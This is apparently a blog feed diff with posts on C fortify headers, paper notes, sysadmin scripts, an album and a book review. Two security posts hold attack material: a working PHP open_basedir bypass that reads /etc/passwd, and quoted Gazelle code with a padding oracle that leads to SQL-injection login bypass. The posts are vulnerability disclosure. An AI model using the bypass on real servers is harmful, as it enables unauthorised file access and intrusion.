+<li>Added a ton of tests, with <a href="https://jvoisin.github.io/fortify-headers/">around 90% of coverage</a></li>
+<li>Made use of <code>__builtin_dynamic_object_size</code> when <code>FORTIFY_SOURCE=3</code> is used,
+ instead of <code>__builtin_object_size</code>.</li>
+<li>Made use of <a href="https://clang.llvm.org/docs/AttributeReference.html">attributes</a>:
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#alloc-size">alloc_size</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-as-builtin">diagnose_as_builtin</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-if">diagnose_if</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#format">format</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#malloc">malloc</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#nodiscard-warn-unused-result">warn_unused_result</a>,
+ …</li>
+<li>Added some missing functions, like <code>calloc</code>, <code>fdopen</code>, <code>fmemopen</code>, <code>fprintf</code>,
+ <code>malloc</code>, <code>memchr</code>, <code>popen</code>, <code>printf</code>, <code>qsort</code>, <code>umask</code>, …</li>
+<li>Added continuous integration, both on clang and gcc, covering the whole range
+ of supported versions across the latest Ubuntu LTS.</li>
+</ul>
+<h2>Implementation details</h2>
+<p>Since this is a pretty uncommon piece of software, friends of mine have been
+asking me details about the involved black magic.
+While it's possible to overload functions with the
+<a href="https://clang.llvm.org/docs/AttributeReference.html#overloadable">overloadable</a>
+attribute in C, there isn't really something similar for drive-by overloading.
+Fortunately, it's possible to hack an equivalent by combining
+<a href="https://gcc.gnu.org/onlinedocs/cpp/Wrapper-Headers.html"><code>#include_next</code></a> with
+the following macros:</p>
+<div class="codehilite"><pre><span></span><code><span class="cp">#define _FORTIFY_STR(s) #s</span>
+<span class="cp">#define _FORTIFY_ORIG(p, fn) __typeof__(fn) __orig_##fn __asm__(_FORTIFY_STR(p) #fn)</span>
+<span class="cp">#define _FORTIFY_FNB(fn) _FORTIFY_ORIG(__USER_LABEL_PREFIX__, fn)</span>
+<span class="cp">#define _FORTIFY_FN(fn) _FORTIFY_FNB(fn); _FORTIFY_INLINE</span>
+</code></pre></div>
+
+<p>This makes the original function available when prefixed with <code>__orig</code>,
+while allowing overloading.
+On clang, the <a href="https://clang.llvm.org/docs/AttributeReference.html#pass-object-size-pass-dynamic-object-size"><code>pass_object_size</code>/<code>pass_dynamic_object_size</code></a>
+attribute is used to pass down arguments size; the assembly label preventing
+weird <a href="https://en.wikipedia.org/wiki/Name_mangling">mangling</a> issues. Since
+it's only a label, despite being assembly, it's still portable across various
+architectures. The <code>_FORTIFY_INLINE</code> macro contains all possible "please inline this
+function" directives as possible, to avoid polluting the symbols.</p>
+<p>There is of course a ton of <code>#ifdef</code>/<code>#if __has_atribute</code>/… to work around various
+compiler intrinsics, like clang missing <code>__builtin_va_arg_pack</code> or gcc missing
+<code>diagnose_if</code>, so that fortify-headers will always make use of the most
+features available.</p>
+<p>It is indeed a particularly gross pile of hacks,
+but this is C, also known as "nice things and why we can't have them."</p>
+<p>Thanks to <a href="https://u.2f30.org/sin/">sin</a> for creating the project and
+maintaining it for years, <a href="https://daniel.micay.dev">strcat</a> for his inspiring
+work on fortifying <a href="https://en.wikipedia.org/wiki/Bionic_(software)">bionic</a>,
+<a href="https://github.com/q66">q66</a> for his clang patches and general support,
+the friendly people from <a href="https://2f30.org">2f30</a> for their patience,
+<a href="http://serge.liyun.free.fr/serge/">Serge Sans Paille</a> for his <a href="https://github.com/serge-sans-paille/fortify-test-suite">testsuite</a>,
+<a href="https://people.freebsd.org/~kevans/">kevans</a> for his work on fortifying
+<a href="https://reviews.freebsd.org/D32306">FreeBSD's libc</a>,
+Red Hat from pushing <code>FORTIFY_SOURCE=2</code> and <code>FORTIFY_SOURCE=3</code> forward,
+...</p>jvoisinTue, 12 Dec 2023 23:30:00 +0100tag:dustri.org,2023-12-12:/b/fortify-headers-20.htmlsecurityPaper notes: CryptOpthttps://dustri.org/b/paper-notes-cryptopt.html<ul>
+<li>Full title: CryptOpt: Verified Compilation with Randomized Program Search for Cryptographic Primitives</li>
+<li>PDF: <a href="https://arxiv.org/abs/2211.10665">arXiv</a> (<a href="https://dustri.org/b/files/papers/cryptopt.pdf">local mirror</a>)</li>
+<li>Authors: Joel Kuepper, Andres Erbsen, Jason Gross, Owen Conoly, Chuyue Sun, Samuel Tian, David Wu, Adam Chlipala, Chitchanok Chuengsatiansup, Daniel Genkin, Markus Wagner, Yuval Yarom</li>
+</ul>
+<p>Cryptography is hard, high-performance one even more so: formal proof of
+assembly implementations is horrible to model, and code generation from
+formal proofs are hard to lower to high-performance assembly. The core idea of
+CryptOpt is to treat this as a black box combinatorial optimization problem,
+and bruteforce possible solutions in a smart way against an oracle.</p>
+<p>More precisely:</p>
+<ol>
+<li>start from a known-correct implementation in
+ <a href="https://github.com/mit-plv/fiat-crypto">fiat-crypto</a> (a
+ coq-powered high-level to low-level IR proven translator) low-level IR;</li>
+<li>lower it via a fuzzer-like machinery replacing/reordering operands
+ applying semantics-and-data-constrains-preserving transformations, which has an acceptable
+ search space because:<ul>
+<li>it's straight-line no-aliasing constant-offset-pointers assembly;</li>
+<li>transformations can be templatised, eg. <code>add ≍ clc; adcx</code>;</li>
+</ul>
+</li>
+<li>lift the resulting x64 assembly to fiat-crypto low-level IR;</li>
+<li>use a custom <a href="https://en.wikipedia.org/wiki/E-graph">e-graph</a> based
+ <em>equivalence checker</em> implemented as a mix between an SMT solver and a symbolic-execution engine;</li>
+<li>if the new implementation is correct, benchmark it against the current;
+ fastest one, and keep it if it's outperforming it.</li>
+<li><code>goto 2</code>.</li>
+</ol>
+<p>This approach has a couple of advantages:</p>
+<ul>
+<li>fuzzers are cheaper than highly specialised engineering time</li>
+<li>porting implementations to new hardware is simply a matter of
+ running CryptOpt on it.</li>
+<li>by lifting the assembly to fiat-crypto low-level IR,
+ there is no need to write complex formal proofs,
+ since fiat-crypto is already taking care of those.</li>
+<li>controlling the mutations allows to ensure that
+ the implementation stays side-channel free.</li>
+</ul>
+<p>The main issue though, is that one needs to formally implement
+whatever algorithm to optimize in fiat-crypto, which is not that easy (and
+which the authors of the paper didn't do for libsecp256k1).</p>
+<p>Implementation-wise, the author ran 200k mutations, with 20 initial candidates,
+over 18 Fiat IR primitives, taking between 20 and 40 CPU hours. Interestingly,
+since the equivalence-based verification is <em>slow</em> (between 0.1s and ~300s),
+it's only done once at the end. They found out that "optimization progress is roughly logarithmic
+in the number of mutations." CryptOpt generates code around 1.20 to 2.50 times
+faster than gcc/clang for the same fiat-crypto generated C code. It's not
+faster then OpenSSL (but offers formally verified correctness), but is
+faster than libsecp256k1.</p>
+<p>The paper was <a href="https://iacr.org/submit/files/slides/2023/rwc/rwc2023/85/slides.pdf">presented</a> at <a href="https://rwc.iacr.org/2023/program.php">Real World Crypto 2023</a>,
+and like all good one, it came with an <a href="https://github.com/0xADE1A1DE/CryptOpt">implementation</a></p>jvoisinFri, 01 Dec 2023 12:30:00 +0100tag:dustri.org,2023-12-01:/b/paper-notes-cryptopt.htmlpaper_notesManaging a bouncer via OpenRChttps://dustri.org/b/managing-a-bouncer-via-openrc.html<p>I'm an avid <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat">IRC</a>
+user, and I'm using <a href="https://en.wikipedia.org/wiki/XMPP">XMPP</a> to idle on
+<a href="https://tails.net/support/index.en.html">Tails</a>' chatrooms. Since protocols
+tend to only work when one is connected, they're both running inside a
+<a href="https://github.com/tmux/tmux">tmux</a> session, acting as a
+<a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>.
+But now that my hypervisor is automatically rebooting to apply security updates,
+and during power cuts via <a href="https://networkupstools.org/">nut</a>,
+I needed a way to automatically restart the bouncer. Since
+it's running in an <a href="https://www.alpinelinux.org/">Alpine Linux</a> container,
+here is my solution in the form of an <a href="https://github.com/OpenRC/openrc">OpenRC</a>
+service script, because I couldn't find one on the internet:</p>
+<div class="codehilite"><pre><span></span><code><span class="ch">#!/sbin/openrc-run</span>
+
+<span class="nv">USER</span><span class="o">=</span>jvoisin
+
+<span class="nv">name</span><span class="o">=</span><span class="s2">"chat"</span>
+<span class="nv">command_user</span><span class="o">=</span><span class="s2">"</span><span class="nv">$USER</span><span class="s2">"</span>
+<span class="nv">command</span><span class="o">=</span>/usr/bin/tmux
+<span class="nv">command_args</span><span class="o">=</span><span class="s2">"new-session -s chat -d '/usr/bin/weechat' \; new-window '/usr/bin/profanity' \; select-window -t -1"</span>
+<span class="nv">pidfile</span><span class="o">=</span><span class="s2">"/run/</span><span class="nv">$SVCNAME</span><span class="s2">.pid"</span>
+
+depend<span class="o">()</span><span class="w"> </span><span class="o">{</span>
+<span class="w"> </span>need<span class="w"> </span>net
+<span class="w"> </span>use<span class="w"> </span>dns<span class="w"> </span>
+<span class="o">}</span><span class="w"> </span>
+
+stop<span class="o">()</span><span class="w"> </span><span class="o">{</span>
+<span class="w"> </span>su<span class="w"> </span><span class="s2">"</span><span class="nv">$USER</span><span class="s2">"</span><span class="w"> </span>-c<span class="w"> </span><span class="s1">'tmux kill-session chat'</span>
+<span class="o">}</span>
+</code></pre></div>jvoisinFri, 24 Nov 2023 16:30:00 +0100tag:dustri.org,2023-11-24:/b/managing-a-bouncer-via-openrc.htmlsysadminNetra - Ingratshttps://dustri.org/b/netra-ingrats.html<p><a href="https://hypnoticdirgerecords.bandcamp.com/album/ingrats"><img alt="Cover" src="https://dustri.org/b/images/netra_ingrats.jpg"></a></p>
+<p><em>Ingrats</em> ("ungrateful ones" in French) is the 3<sup>rd</sup> album from
+Netra, and it's a very lonely one, for I don't think it has any peers. A mix of
+depressive black metal, trip hop, and jazz à la <a href="https://en.wikipedia.org/wiki/Bohren_%26_der_Club_of_Gore">Bohren & der Club of
+Gore</a> in equal
+measures, bound together with a hint of depressive darkwave, resulting
+in a not only surprisingly cohesive and daring record, but also an excessively
+pleasant and honest one.</p>
+<p>Opening with "Gimme a break", a mellow jazzy noir blues vibe where one wants to
+snap in rhythm, things quickly devolve into blast beats, raw screams and
+twisted guitar of "Everything’s Fine", arguably the most black-metal-esque song
+of the album. Albeit it is way more than yet-another-black-metal-track,
+morphing into something more complex, with an eerie piano melody, and some
+almost gothic rock clear singing. The sudden transitions are perfectly
+executed, and the work on the voices is truly delicious, resulting in an
+alienating, impetuous yet melancholic track. "Underneath my words the ruins of
+yours" is a subtle mix of trip-hop and atmospheric post-rock/darkwave,
+pursuing with "Live with It", even more trip-hop, but this time with a
+<a href="https://en.wikipedia.org/wiki/Syncopation">syncopated</a> rhythm, 80s gothic
+rock, clean vocals and acoustic guitars, … it results in something like
+Katatonia doing a feat with <a href="https://en.wikipedia.org/wiki/Gramatik">Gramatik</a>
+and <a href="https://en.wikipedia.org/wiki/Ulver">Ulver</a> period early 2000s.</p>
+<p>Then the calm before the storm, "Infinite bordedom", a one minute interlude of grainy piano under the rain,
+announcing "Don't Keep Me Waiting", some sort of nihilist black metal track,
+but with the noted presence of a saxophone and some clear touches of jazz. The presence of a whispered sample
+from <a href="https://en.wikipedia.org/wiki/The_Minister">L’exercice de l’État</a>
+has a gentle touch of <a href="https://www.metal-archives.com/bands/B%C3%A2%27a/3540445572">Ba'a</a>. Moving on
+to "A Genuinely Benevolent Man", starting with synthesisers,
+then a 4|4 kick resulting in something that could be on a <a href="https://en.wikipedia.org/wiki/VNV_Nation">VNV Nation</a> album.
+Until it decays into something more raw, and when the shrieking vocals
+are showing up, you didn't even realise that we've left the world of the darkwave
+to return into the one of black metal.</p>
+<p>"Paris or Me", dark and rainy, with bits of triptop percussion,
+introducing "Could've, Should've, Would've", with tasteful hints of Depeche Mode, Dead Can Dance,
+post-2000 Velvet Acid Christ, giving it a resolute tasteful darkwave-synth-pop-EBM
+cocktail. The album ends with "Jusqu'au-boutiste", starting with some jazzy piano on a <a href="https://en.wikipedia.org/wiki/Bassline#Walking_bass">walking
+bass</a>, turning into an ultra-saturated tremolo riff with blast beats,
+and both worlds are alternating along the track, only interrupted by a very à
+propos sample from <a href="https://en.wikipedia.org/wiki/Low_Down">Low Down</a>. It goes
+on until the piano gets creepier and creepier, landing into strings,
+morphing into dislocated tip-hop soul, beaching onto calm synthesisers,
+and ending with raw black metal as background for electronic sounds.</p>
+<p>As <a href="https://hypnoticdirgerecords.com/">Hypnotic Dirge Records</a>, the label on which the disc was produced, perfectly
+summarised:</p>
+<blockquote>
+<p>The perfect soundtrack for late-night walks in the city. The material on
+“Ingrats” is an all-out assault on the senses, a bitter pill that must be
+swallowed as an accompaniment for self-reflection. An album which can connect
+emotionally and leave you drained at the end.</p>
+</blockquote>jvoisinSat, 18 Nov 2023 22:45:00 +0100tag:dustri.org,2023-11-18:/b/netra-ingrats.htmlmusicini_set based open_basedir bypasshttps://dustri.org/b/ini_set-based-open_basedir-bypass.html<p>This one was burned by <a href="https://twitter.com/Blaklis_">Blaklis</a> in 2019,
+by being the expected solution for his
+<a href="https://github.com/Blaklis/my-challenges/tree/master/phuck3">Phuck3</a> challenge
+for InsomniHack Finals 2019, but has been known long before.</p>
+<p>In the words of <a href="https://www.php.net/manual/en/ini.core.php#ini.open-basedir">PHP's documentation</a> on <code>open_basedir</code>:</p>
+<blockquote>
+<p>When a script tries to access the filesystem, for example using include,
+or fopen(), the location of the file is checked. When the file is outside the
+specified directory-tree, PHP will refuse to access it. All symbolic links are
+resolved, so it's not possible to avoid this restriction with a symlink. If the
+file doesn't exist then the symlink couldn't be resolved and the filename is
+compared to (a resolved) open_basedir. </p>
+<p>[…]</p>
+<p>open_basedir is just an extra safety net, that is in no way comprehensive, and can therefore not be relied upon when security is needed. </p>
+</blockquote>
+<p>It has been more or less fixed in <a href="https://github.com/php/php-src/commit/ee9e07541f9f07762e3ee781102eea3a4190787c">March 2021</a>,
+then again in <a href="https://github.com/php/php-src/commit/61e98bf35eb939bdd7b27ad7938f8549db2e1551">March 2023</a>,
+and again in <a href="https://github.com/php/php-src/commit/9bcdf219ec6e8d6c2a55f1712b7d868b9129ef8d">July 2023</a>.
+But I wouldn't be surprised if more low-hanging bypasses were lurking ;)</p>
+<p>The crux of the bypass is that php didn't resolve relative paths both in
+<code>ini_set</code> and when checking <code>php_check_open_basedir</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="o"><?</span><span class="nx">php</span>
+<span class="k">echo</span> <span class="nb">ini_get</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">);</span> <span class="c1">// /var/www/html</span>
+<span class="nb">mkdir</span><span class="p">(</span><span class="s1">'./tmp'</span><span class="p">);</span>
+<span class="nb">chdir</span><span class="p">(</span><span class="s1">'./tmp'</span><span class="p">);</span>
+<span class="nb">ini_set</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">,</span> <span class="s1">'..'</span><span class="p">);</span>
+<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><=</span> <span class="mi">24</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
+ <span class="nb">chdir</span><span class="p">(</span><span class="s1">'..'</span><span class="p">);</span>
+<span class="p">}</span>
+<span class="nb">ini_set</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">,</span><span class="s1">'/'</span><span class="p">)</span>
+<span class="k">echo</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"/etc/passwd"</span><span class="p">);</span>
+</code></pre></div>jvoisinFri, 03 Nov 2023 16:30:00 +0100tag:dustri.org,2023-11-03:/b/ini_set-based-open_basedir-bypass.htmlphpBook review: Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Crackinghttps://dustri.org/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html<p><a href="https://nostarch.com/locksport"><img alt="Locksport's cover" src="https://dustri.org/b/images/locksport.png"></a></p>
+<p>I'm starting to feel guilty about getting ebooks for free from
+<a href="https://nostarch.com/about">No Starch Press</a>, but apparently they're happy to
+send them my way in exchange for a review, so I won't complain.</p>
+<p>Anyway, I got a copy of the early access version <a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking,
+Impressioning, and Safe Cracking</a>!
+It's obviously a book about lockpicking, but, as <em>hinted</em> by its name,
+from the <a href="https://www.lockwiki.com/index.php/Locks port">sport</a> angle.</p>
+<p>I'm not completely clueless when it comes to picking locks, but I've always been
+mediocre at best, since I never really put the effort into practising anything
+but the basics. This was thus a great opportunity for a deeper dive!
+So I got myself a <a href="https://covertinstruments.com/collections/lockpicks/products/genesis-lock-pick">proper set of picks</a>,
+3 cutaway training locks <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-serrated-pins">one with serrated pins</a>,
+<a href="https://www.sparrowslockpicks.com/products/cut-away-lock-spool-pins">with spool pins</a>,
+and <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-check-pins">one with stupid chess pieces pins</a>,
+and a couple of locks/padlocks from my local locksmith, and dove into the book!</p>
+<p>I was a bit curious about its content, since I didn't bother reading the table of contents,
+and was expecting a pile of techniques to open <a href="https://en.wikipedia.org/wiki/Wafer_tumbler_lock">wafer tumbler locks</a>
+in the fastest way possible. But the book is so much more than that, with
+historical perspectives, a bit of legalese, the proper etiquette to participate in lockpicking
+competitions and how to organise one, anecdotes, mechanical details and
+resources for those who <a href="https://en.wikipedia.org/wiki/Starship_Troopers_(film)">would like to know
+more</a>, how to tear
+apart, modify, take care of, and reassemble locks, where to get equipment,
+how to <a href="https://www.lockwiki.com/index.php/Impressioning">impression keys</a>,
+details on <a href="https://en.wikipedia.org/wiki/Lever_tumbler_lock">lever tumbler locks</a>
+and <a href="https://en.wikipedia.org/wiki/Safe">vaults</a>,
+…</p>
+<p>The part about wafer locks, while interesting, doesn't really go much further
+than some basic techniques for entry-level <a href="https://lockwiki.com/index.php/Security_pin#Security_pin_illustrations">security pins</a>,
+but I guess practise is the only way to learn how to handle anything non-trivial anyway.
+On the other hand, the part about lever locks was highly entertaining,
+since those are really weird compared to the <em>usual</em> locks,
+and I didn't know much about them.</p>
+<p>I recently gifted myself a <a href="https://www.sparrowslockpicks.com/products/challenge-vault">Sparrow's challenge vault</a> for my birthday,
+and was thus highly delighted to discover that the book has a whole section
+on <a href="https://en.wikipedia.org/wiki/Safe-cracking">safe manipulation</a>; which is
+fortunate since the instructions coming with the vault are <s>pure garbage</s>
+confusing at best.</p>
+<p>The only issue I had with the book is that while it's full of gorgeous colourful
+pictures, like the small marks left by pins during key impressioning,
+they are unfortunately barely legible on my
+<a href="https://www.pocketbook-int.com/ge/products/pocketbook-inkpad-3">Pocketbook InkPad 3</a>,
+so I'd recommend getting the paperback version if you don't have a 𝖙𝖗𝖚𝖊𝖈𝖔𝖑𝖔𝖗 4𝖐
+𝕳𝕯𝕽 e-reader.</p>
+<p>All in all, it's a really great self-contained book for newcomers and beginners,
+entertaining, detailed, … and doing a tremendous job at making
+lockpicking competitions look cool yet accessible! It was also a nice motivation booster for me to
+tackle harder locks.</p>
+<p>If you already know your way around locks, you might want to look at <a href="https://www.barnesandnoble.com/w/high-security-mechanical-locks-graham-pulford/1111341233">High-Security Mechanical Locks: An
+Encyclopedic
+Reference</a> instead.</p>jvoisinFri, 20 Oct 2023 18:00:00 +0200tag:dustri.org,2023-10-20:/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.htmlbook_reviewsAuthentication bypass on What.CD's Gazellehttps://dustri.org/b/authentication-bypass-on-whatcds-gazelle.html<p><a href="https://en.wikipedia.org/wiki/What.CD">What.CD</a> has been dead since 2016, and
+hopefully <a href="https://github.com/OPSnet/Gazelle/blob/master/app/Util/Crypto.php">nobody</a>
+is using <a href="https://github.com/WhatCD/Gazelle">Gazelle</a>,
+their "web framework geared towards private BitTorrent tracker" anymore.
+I've been sitting on this one for years, I know I wasn't the only one,
+and it's not the only low-hanging vulnerability lurking there.</p>
+<p>Rolling your own blunt is alright, rolling your own authentication scheme
+less so: there is a trivial <a href="https://en.wikipedia.org/wiki/Padding_oracle_attack">padding oracle</a>
+in the <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/encrypt.class.php#L24">homegrown crypto scheme</a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="k">public</span> <span class="k">function</span> <span class="nf">decrypt</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">,</span> <span class="nv">$Key</span> <span class="o">=</span> <span class="nx">ENCKEY</span><span class="p">)</span> <span class="p">{</span>
+ <span class="k">if</span> <span class="p">(</span><span class="nv">$CryptStr</span> <span class="o">!=</span> <span class="s1">''</span><span class="p">)</span> <span class="p">{</span>
+ <span class="nv">$IV</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span>
+ <span class="nv">$CryptStr</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">16</span><span class="p">);</span>
+ <span class="k">return</span> <span class="nb">trim</span><span class="p">(</span><span class="nb">mcrypt_decrypt</span><span class="p">(</span><span class="nx">MCRYPT_RIJNDAEL_128</span><span class="p">,</span> <span class="nv">$Key</span><span class="p">,</span> <span class="nv">$CryptStr</span><span class="p">,</span> <span class="nx">MCRYPT_MODE_CBC</span><span class="p">,</span> <span class="nv">$IV</span><span class="p">));</span>
+ <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
+ <span class="k">return</span> <span class="s1">''</span><span class="p">;</span>
+ <span class="p">}</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>leading to an <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/ajax_start.php#L23-L31">authentication bypass via a SQL injection</a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'session'</span><span class="p">]))</span> <span class="p">{</span>
+ <span class="nv">$LoginCookie</span> <span class="o">=</span> <span class="nv">$Enc</span><span class="o">-></span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'session'</span><span class="p">]);</span>
+<span class="p">}</span>
+<span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">))</span> <span class="p">{</span>
+ <span class="k">list</span><span class="p">(</span><span class="nv">$SessionID</span><span class="p">,</span> <span class="nv">$UserID</span><span class="p">)</span> <span class="o">=</span> <span class="nb">explode</span><span class="p">(</span><span class="s2">"|~|"</span><span class="p">,</span> <span class="nv">$Enc</span><span class="o">-></span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">));</span>
+
+ <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$UserID</span> <span class="o">||</span> <span class="o">!</span><span class="nv">$SessionID</span><span class="p">)</span> <span class="p">{</span>
+ <span class="k">die</span><span class="p">(</span><span class="s1">'Not logged in!'</span><span class="p">);</span>
+ <span class="p">}</span>
+
+ <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$Enabled</span> <span class="o">=</span> <span class="nv">$Cache</span><span class="o">-></span><span class="na">get_value</span><span class="p">(</span><span class="s2">"enabled_</span><span class="si">$UserID</span><span class="s2">"</span><span class="p">))</span> <span class="p">{</span>
+ <span class="k">require</span><span class="p">(</span><span class="nx">SERVER_ROOT</span><span class="o">.</span><span class="s1">'/classes/mysql.class.php'</span><span class="p">);</span> <span class="c1">//Require the database wrapper</span>
+ <span class="nv">$DB</span> <span class="o">=</span> <span class="k">NEW</span> <span class="nx">DB_MYSQL</span><span class="p">;</span> <span class="c1">//Load the database wrapper</span>
+ <span class="nv">$DB</span><span class="o">-></span><span class="na">query</span><span class="p">(</span><span class="s2">"</span>
+<span class="s2"> SELECT Enabled</span>
+<span class="s2"> FROM users_main</span>
+<span class="s2"> WHERE ID = '</span><span class="si">$UserID</span><span class="s2">'"</span><span class="p">);</span>
+ <span class="k">list</span><span class="p">(</span><span class="nv">$Enabled</span><span class="p">)</span> <span class="o">=</span> <span class="nv">$DB</span><span class="o">-></span><span class="na">next_record</span><span class="p">();</span>
+ <span class="nv">$Cache</span><span class="o">-></span><span class="na">cache_value</span><span class="p">(</span><span class="s2">"enabled_</span><span class="si">$UserID</span><span class="s2">"</span><span class="p">,</span> <span class="nv">$Enabled</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
+ <span class="p">}</span>
+<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
+ <span class="k">die</span><span class="p">(</span><span class="s1">'Not logged in!'</span><span class="p">);</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Conveniently, the oracle doesn't touch the database, is completely stateless,
+and only shows up in the httpd/reverse-proxy's logs, which shouldn't log the cookies'
+content, making forensic analysis nigh impossible. Once you're admin, there are
+a bunch of available SQL injections, like in
+<a href="https://github.com/WhatCD/Gazelle/blob/master/sections/reportsv2/takeresolve.php"><code>takerevolve.php</code></a>.
+From there, remote code execution is doable, but left as an exercise for the
+reader.</p>jvoisinFri, 13 Oct 2023 19:45:00 +0200tag:dustri.org,2023-10-13:/b/authentication-bypass-on-whatcds-gazelle.htmlsecurityVideo acceleration in Jellyfin inside a Proxmox containerhttps://dustri.org/b/video-acceleration-in-jellyfin-inside-a-proxmox-container.html<p>For various reasons, including "video decoding is hard", "your web browser hates you"
+and "watching movies on a phone over 3G is a basic human necessity",
+enabling hardware-accelerated video decoding in <a href="https://jellyfin.org">Jellyfin</a>
+is a desirable goal if you don't want your CPU to set your house on fire. </p>
+<p>To attain it, one can mess around <a href="https://github.com/ddimick/proxmox-lxc-idmapper">cryptic gid mappings</a>,
+but granting every user on the hypervisor the right to read/write <code>/dev/dri/renderD128</code> and
+<code>/dev/dri/card0</code> is way easier, and it looks like this:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>><span class="w"> </span>/etc/udev/rules.d/99-intel-chmod666.rules<span class="w"> </span><<<span class="w"> </span><span class="s1">'EOF'</span>
+<span class="go">KERNEL=="renderD128", MODE="0666"</span>
+<span class="go">KERNEL=="card0", MODE="0666"</span>
+<span class="go">EOF</span>
+<span class="gp"># </span>udevadm<span class="w"> </span>control<span class="w"> </span>--reload-rules<span class="w"> </span><span class="o">&&</span><span class="w"> </span>udevadm<span class="w"> </span>trigger
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>It doesn't really worsen security, since:
+- the devices are only mounted inside my jellyfin container, which would have
+ the same privileges as if I used gid mapping.
+- odds are that an attacker able to get a shell on the hypervisor wouldn't
+ really need to have r/w access to the two devices to escalate their
+ privileges anyway, since they would either be:
+ - root already to escape from a container
+ - root already to escape from a vm
+ - whatever proxmox user and likely able to escalate to <code>root</code> trivially
+ - other users are sandboxed via systemd and/or seccomp.</p>
+<p>Speaking of mounting things inside the container:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>><span class="w"> </span>/etc/pve/lxc/114.conf<span class="w"> </span><<<span class="w"> </span><span class="s1">'EOF'</span>
+<span class="go">lxc.cgroup2.devices.allow: c 226:0 rwm</span>
+<span class="go">lxc.cgroup2.devices.allow: c 226:128 rwm</span>
+<span class="go">lxc.mount.entry: /dev/dri dev/dri none bind,optional,create=dir</span>
+<span class="go">lxc.mount.entry: /dev/dri/renderD128 dev/renderD128 none bind,optional,create=file</span>
+<span class="go">EOF</span>
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>You can now run <code>vainfo</code> inside the container and be delighted by the
+presence of the <a href="https://en.wikipedia.org/wiki/Video_Acceleration_API">VA-API</a> version number:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>vainfo<span class="w"> </span><span class="m">2</span>>/dev/null<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">1</span>
+<span class="go">libva info: VA-API version 1.17.0</span>
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>The last step is to tick all the boxes in <a href="https://jellyfin.org/docs/general/administration/hardware-acceleration/">Jellyfin's
+preferences</a>
+and you're good to go. Don't forget to make some space on the disk for the
+transcoding cache, at least until <a href="https://github.com/jellyfin/jellyfin/pull/8744">this</a>
+makes its way into a release.</p>jvoisinSun, 01 Oct 2023 22:15:00 +0200tag:dustri.org,2023-10-01:/b/video-acceleration-in-jellyfin-inside-a-proxmox-container.htmlsysadminPaper notes: Breaking Bad: Quantifying the Addiction of Web Elements to JavaScripthttps://dustri.org/b/paper-notes-breaking-bad-quantifying-the-addiction-of-web-elements-to-javascript.html<p><a href="https://arxiv.org/pdf/2301.10597.pdf">PDF</a>, <a href="https://dustri.org/b/files/papers/breaking_bad.pdf">local mirror</a></p>
+<p>More or less all conversations involving the <a href="https://www.torproject.org/download/">tor browser</a>
+will at some point contain the following line: "No, javascript isn't disabled
+by default because too many sites would break. You can always crank the
+security slider all the way up if you want tho."</p>
+<p>We all agree that javascript enables all sorts of despicable behaviours making
+the web a nightmare-material privacy/security cesspit and completely
+inscrutable to a lot of users, so having research done
+to quantify how to make it a better place for everyone is always more than welcome.</p>
+<p>The main idea of the paper is to load pages from the <a href="https://hispar.cs.duke.edu/">Hispar
+set</a> with and without <code>javascript.enabled</code> set,
+via <a href="https://pptr.dev">Puppeteer</a>, and to perform
+magic human-assisted smart diffing to detect user-perceived/perceivable
